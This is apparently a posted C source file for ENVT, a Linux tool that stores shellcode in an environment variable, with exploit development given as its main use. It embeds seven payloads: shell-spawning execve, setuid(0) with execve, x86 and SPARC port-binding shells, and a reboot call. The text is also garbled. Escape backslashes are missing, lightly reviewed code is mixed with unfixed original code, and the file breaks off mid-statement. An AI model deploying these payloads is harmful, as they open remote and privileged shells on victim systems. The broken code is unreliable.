darkking

ENVT v0.01, Simple Environment shellcode injector for linux


Tool for Linux (*nix). It supports PPC, SPARC, MIPS and x86 processors.

This tool injects shellcode into the Linux environment so that it can be used for exploit development, IDS detection testing and similar work.

[ SIGINT , SIGHUP , SIGABRT handlers added ]

/*

* Qnix <Qnix@bsdmail.org>

* ENVT v0.01

*

* */

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

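#define VERSION "v0.1"     /* NOTE(review): the file header says v0.01 — confirm which is intended */
#define MAX_SIZE 1024      /* size of the option buffer used in main() */
#define SHSIZE 512         /* size of each shellcode staging buffer in setshenv() */
#define bash "/bin/bash"   /* shell execl()'d by setshenv(); lowercase name kept for existing uses */

/* Prototypes.
 * version() and shellcode_list() are defined below main() but were missing
 * here, so their calls in main() relied on implicit declarations (invalid
 * since C99). Their definitions use an empty parameter list, which is
 * compatible with the (void) prototypes. */
int version(void);
int shellcode_list(void);
void getenvaddr(char *environment);
void help(char *string);
void setshenv(int shellcode);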

/****************** START OF SHELLCODES ******************/

/* Shellcode 1 in the -l menu: x86 execve of a shell via int 0x80 (see mnemonics).
 * NOTE(review): the literal appears transcribed without its escape backslashes;
 * as written it is plain ASCII text, not the bytes the mnemonics describe, and
 * strlen() in setshenv() measures that text. */
char execve_binbash[] =
"x31xc0" // xor %eax, %eax
"x50" // push %eax
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3" // mov %esp, %ebx
"x50" // push %eax
"x53" // push %ebx
"x89xe1" // mov %esp, %ecx
"x31xd2" // xor %edx, %edx
"xb0x0b" // mov $0xb, %al
"xcdx80"; // int $0x80

/* Shellcode 2 in the -l menu: x86 setuid/setgid followed by execve (see mnemonics).
 * NOTE(review): same transcription caveat as execve_binbash — the escape
 * backslashes appear to be missing, so this is ASCII text as written. */
char execve_setuid_setgid_bb[] =
"x6ax17" // push $0x17
"x58" // pop %eax
"x31xdb" // xor %ebx, %ebx
"xcdx80" // int $0x80
"x6ax2e" // push $0x2e
"x58" // pop %eax
"x53" // push %ebx
"xcdx80" // int $0x80
"x31xd2" // xor %edx, %edx
"x6ax0b" // push $0xb
"x58" // pop %eax
"x52" // push %edx
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3" // mov %esp, %ebx
"x52" // push %edx
"x53" // push %ebx
"x89xe1" // mov %esp, %ecx
"xcdx80"; // int $0x80

/* Shellcode 3 in the -l menu: x86 port-bind (socket/bind/listen/accept/dup2/execve
 * per the section comments; port 64713 per the pushw comment).
 * NOTE(review): escape backslashes appear missing — ASCII text as written. */
char portbind_64713[] =
/* socket(AF_INET, SOCK_STREAM, 0) */
"x6ax66" // push $0x66
"x58" // pop %eax
"x6ax01" // push $0x1
"x5b" // pop %ebx
"x99" // cltd
"x52" // push %edx
"x53" // push %ebx
"x6ax02" // push $0x2
"x89xe1" // mov %esp,%ecx
"xcdx80" // int $0x80
/* bind(s, server, sizeof(server)) */
"x52" // push %edx
"x66x68xfcxc9" // pushw $0xc9fc // PORT = 64713
"x66x6ax02" // pushw $0x2
"x89xe1" // mov $esp,%ecx
"x6ax10" // push $0x10
"x51" // push %ecx
"x50" // push %eax
"x89xe1" // mov %esp,%ecx
"x89xc6" // mov %eax,%esi
"x43" // inc %ebx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
/* listen(s, anything) */
"xb0x66" // mov $0x66,%al
"xd1xe3" // shl %ebx
"xcdx80" // int $0x80
/* accept(s, 0, 0) */
"x52" // push %edx
"x56" // push %esi
"x89xe1" // mov %esp,%ecx
"x43" // inc %ebx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
"x93" // xchg %eax,%ebx
/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
"x6ax02" // push $0x2
"x59" // pop %ecx
"xb0x3f" // mov $0x3f,%al
"xcdx80" // int $0x80
"x49" // dec %ecx
"x79xf9" // jns dup_loop
/* execve("/bin/sh", ["/bin/sh"], NULL) */
"x6ax0b" // push $0xb
"x58" // pop %eax
"x52" // push %edx
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3" // mov %esp, %ebx
"x52" // push %edx
"x53" // push %ebx
"x89xe1" // mov %esp, %ecx
"xcdx80"; // int $0x80

/* Shellcode 4 in the -l menu: x86 reboot syscall with the kernel magic
 * constants shown in the mnemonics.
 * NOTE(review): escape backslashes appear missing — ASCII text as written. */
char reboot_20[] =
"x6ax58" // push $0x58
"x58" // pop %eax
"xbbxadxdexe1xfe" // mov $0xfee1dead,%ebx
"xb9x69x19x12x28" // mov $0x28121969,%ecx
"xbax67x45x23x01" // mov $0x1234567,%edx
"xcdx80"; // int $0x80

/* Shellcode 5 in the -l menu: SPARC port-bind (trap 0x10 syscalls per the mnemonics).
 * NOTE(review): the menu text says port 8975; that value is not visible in the
 * mnemonics here, so confirm before relying on it. Escape backslashes appear
 * missing — ASCII text as written. */
char sparc_portbind[]=
"x9dxe3xbfx78" // save %sp, -136, %sp
"x90x10x20x02" // mov 2, %o0
"x92x10x20x01" // mov 1, %o1
"x94x22x80x0a" // sub %o2, %o2, %o2
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]
"x90x10x20x01" // mov 1, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"xd0x27xbfxf4" // st %o0, [ %fp + -12 ]
"x90x10x20x02" // mov 2, %o0
"xd0x37xbfxd8" // sth %o0, [ %fp + -40 ]
"x13x08xc8xc8" // sethi %hi(0x23232000), %o1
"x90x12x63x0f" // or %o1, 0x30f, %o0
"xd0x37xbfxda" // sth %o0, [ %fp + -38 ]
"xc0x27xbfxdc" // clr [ %fp + -36 ]
"x92x07xbfxd8" // add %fp, -40, %o1
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"x94x10x20x10" // mov 0x10, %o2
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]
"x90x10x20x02" // mov 2, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"x92x10x20x05" // mov 5, %o1
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"x90x10x20x04" // mov 4, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"x92x07xbfxd8" // add %fp, -40, %o1
"x94x07xbfxec" // add %fp, -20, %o2
"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0
"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]
"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]
"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]
"x90x10x20x05" // mov 5, %o0
"x92x03xa0x44" // add %sp, 0x44, %o1
"x82x10x20xce" // mov 0xce, %g1
"x91xd0x20x10" // ta 0x10
"xd0x27xbfxf0" // st %o0, [ %fp + -16 ]
"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0
"x92x22x40x09" // sub %o1, %o1, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0
"x92x10x20x01" // mov 1, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0
"x92x10x20x02" // mov 2, %o1
"x82x10x20x5a" // mov 0x5a, %g1
"x91xd0x20x10" // ta 0x10
"x2dx0bxd8x9a" // sethi %hi(0x2f626800), %l6
"xacx15xa1x6e" // or %l6, 0x16e, %l6
"x2fx0bxdcxda" // sethi %hi(0x2f736800), %l7
"x90x0bx80x0e" // and %sp, %sp, %o0
"x92x03xa0x08" // add %sp, 8, %o1
"x94x22x80x0a" // sub %o2, %o2, %o2
"x9cx03xa0x10" // add %sp, 0x10, %sp
"xecx3bxbfxf0" // std %l6, [ %sp + -16 ]
"xd0x23xbfxf8" // st %o0, [ %sp + -8 ]
"xc0x23xbfxfc" // clr [ %sp + -4 ]
"x82x10x20x3b" // mov 0x3b, %g1
"x91xd0x20x10"; // ta 0x10

/* Shellcode 6 in the -l menu: MIPS execve of /bin/sh (attributed to "core" below).
 * NOTE(review): escape backslashes appear missing — ASCII text as written;
 * the trailing "/bin/sh" is the only part that survives transcription intact. */
char mips_sh[] =
/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
"xffxffx10x04xabx0fx02x24"
"x55xf0x46x20x66x06xffx23"
"xc2xf9xecx23x66x06xbdx23"
"x9axf9xacxafx9exf9xa6xaf"
"x9axf9xbdx23x21x20x80x01"
"x21x28xa0x03xccxcdx44x03"
"/bin/sh";

/* Shellcode 7 in the -l menu: PowerPC execve of /bin/sh (see mnemonics).
 * The trailing 'Z' is a placeholder the code is expected to overwrite with
 * a NUL at run time (per the original comment).
 * NOTE(review): escape backslashes appear missing — ASCII text as written. */
char ppc_sh[] =
"x7cx3fx0bx78" /*mr r31,r1*/
"x7cxa5x2ax79" /*xor. r5,r5,r5*/
"x42x40xffxf9" /*bdzl+ 10000454<main>*/
"x7fx08x02xa6" /*mflr r24*/
"x3bx18x01x34" /*addi r24,r24,308*/
"x98xb8xfexfb" /*stb r5,-261(r24)*/
"x38x78xfexf4" /*addi r3,r24,-268*/
"x90x61xffxf8" /*stw r3,-8(r1)*/
"x38x81xffxf8" /*addi r4,r1,-8*/
"x90xa1xffxfc" /*stw r5,-4(r1)*/
"x3bxc0x01x60" /*li r30,352*/
"x7fxc0x2ex70" /*srawi r0,r30,5*/
"x44xdexadxf2" /*.long 0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL

/****************** END OF SHELLCODES ******************/

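/*
 * Entry point.
 *
 * Two modes:
 *  - If ENVT is already present in the environment, this process is the
 *    shell spawned by setshenv(); it reports the address of the environment
 *    string via getenvaddr() and exits.
 *  - Otherwise parse the options: -v (version), -h (help), -l (shellcode
 *    list), -s <number> (place shellcode <number> in the environment).
 *    version(), help() and shellcode_list() all exit() themselves.
 *
 * Returns 0 on success, 1 on a malformed option or an invalid -s operand.
 */
int main(int argc, char *argv[]) {
    /* Block-scope prototypes: both functions are defined after main() and the
     * file's prototype list does not include them, so without these the calls
     * below would be implicit declarations. */
    int version(void);
    int shellcode_list(void);

    /* getopt() globals declared explicitly so a strict-ISO build still links
     * (the original code did the same); optind is not used here. */
    extern char *optarg;
    extern int optopt;

    char *addr = getenv("ENVT");
    if (addr != NULL) {
        getenvaddr(addr);
        exit(0);
    }

    if (argc < 2) {
        help(argv[0]); /* exits */
    }

    int c;
    while ((c = getopt(argc, argv, ":s:lhv")) != -1) {
        switch (c) {
        case 'v':
            version(); /* exits */
            break;
        case 'h':
            help(argv[0]); /* exits */
            break;
        case 'l':
            shellcode_list(); /* exits */
            break;
        case 's': {
            /* Parse the operand strictly. The original strncpy()+atoi() path
             * never NUL-terminated its buffer and silently mapped garbage or
             * out-of-range input to 0. */
            char *end = NULL;
            errno = 0;
            long num = strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0' || errno == ERANGE ||
                num < 0 || num > INT_MAX) {
                fprintf(stderr, "Invalid shellcode number '%s'\n", optarg);
                return 1;
            }
            setshenv((int)num);
            break;
        }
        case ':':
            fprintf(stderr, "Option -%c requires an operand\n", optopt);
            return 1;
        case '?':
            /* Leading ':' in the optstring makes getopt() report unknown
             * options as '?' instead of printing its own diagnostic. */
            fprintf(stderr, "Unknown option -%c\n", optopt);
            return 1;
        default:
            break;
        }
    }
    return 0;
}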

/*

* Display version .

*

* */

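/*
 * Print the tool name/version and the author line to stdout, then exit(0).
 * Never returns; the int return type is kept for existing callers.
 * NOTE(review): VERSION expands to "v0.1" while the file header says
 * v0.01 — confirm which is intended.
 */
int version(void) {
    fprintf(stdout, "ENVT %s\n", VERSION);
    fprintf(stdout, "Coded by Qnix <Qnix@bsdmail.org>\n");
    exit(0);
}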

/*

* Display help .

*

* */

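/*
 * Report where the ENVT environment string lives in this process.
 *
 * @param environment  pointer returned by getenv("ENVT"); only its address
 *                     is printed, the contents are not read.
 *
 * The argument is cast to void * because %p is only defined for void
 * pointers; passing a char * directly is undefined behaviour in strict C.
 */
void getenvaddr(char *environment) {
    fprintf(stdout, "SHELLCODE FOUND IN %p\n", (void *)environment);
}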

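/*
 * Print the usage text to stderr and exit(0). Never returns.
 *
 * @param string  program name (argv[0]) shown in the "Usage :" line.
 */
void help(char *string) {
    fprintf(stderr,
            "Usage : %s\n"
            "-l:(shellcode-list)\n"
            "-s:<shellcode-number>\n"
            "-h:(help)\n"
            "-v:(version)\n",
            string);
    exit(0);
}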

/*

* Display shellcode list .

*

* */

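/*
 * Print the numbered menu of available shellcodes (the number is what -s
 * expects) to stdout, then exit(0). Never returns.
 *
 * The entries are kept as a table and written with fputs() so the menu text
 * is never interpreted as a format string; the wording is unchanged from the
 * original apart from the restored newline/tab escapes.
 */
int shellcode_list(void) {
    static const char *const entries[] = {
        "\n\t\t\t::[ LINUX/x86 ]::\n",
        "1) linux/x86 execve(\"/bin/sh\", [\"/bin/sh\", NULL]) 25 bytes\n",
        "2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes\n",
        "3) linux/x86 portbind (port 64713) 86 bytes\n",
        "4) linux/x86 reboot() - 20 bytes\n\n",
        "\t\t\t::[ LINUX/SPARC ]::\n",
        "5) linux/SPARC portbind port 8975 284 bytes\n\n",
        "\t\t\t::[ LINUX/MIPS ]::\n",
        "6) linux/mips execve /bin/sh 56 bytes\n\n",
        "\t\t\t::[ LINUX/PPC ]::\n",
        "7) linux/ppc execve /bin/sh 60 bytes\n\n",
    };
    for (size_t i = 0; i < sizeof entries / sizeof entries[0]; i++) {
        fputs(entries[i], stdout);
    }
    exit(0);
}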

/*

* Set Shellcode in environment .

*

* */

void setshenv(int shellcode) {

char *addr = getenv("ENVT"); // Use to get shellcode addr

char execvebb[sHSIZE]; // Use for shellcode(1)

char setugbb[sHSIZE]; // Use for shellcode(2)

char portbind[sHSIZE]; // Use for shellcode(3)

char reboot[sHSIZE]; // Use for shellcode(4)

char sparc1[sHSIZE]; // Use for shellcode(5)

char mips1[sHSIZE]; // Use for shellcode(6)

char ppc1[sHSIZE]; // Use for shellcode(7)

if(shellcode >= 8) {

fprintf(stderr,"Error : shellcode number %d unavailable type -l to viewnthe available shellcodes.n",shellcode);

exit(0);

}

/* Shellcode number 1 */

if(shellcode == 1) {

fprintf(stdout,"Shellcode: Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");

fprintf(stdout,"[+]t Setting memory for the shellcode .n");

memset(execvebb,0x90,SHSIZE);

fprintf(stdout,"[+]t Copying shellcode to memory .n");

memcpy(&execvebb[sHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash));

memcpy(execvebb,"ENVT=",5);

fprintf(stdout,"[+]t Putting shellcode in the environment .n");

putenv(execvebb);

fprintf(stdout,"[+]t Going into the environment (ENVT) and exiting ....nDone %d bytes loaded to (ENVT)n",strlen(execve_binbash));

execl(bash, bash, '
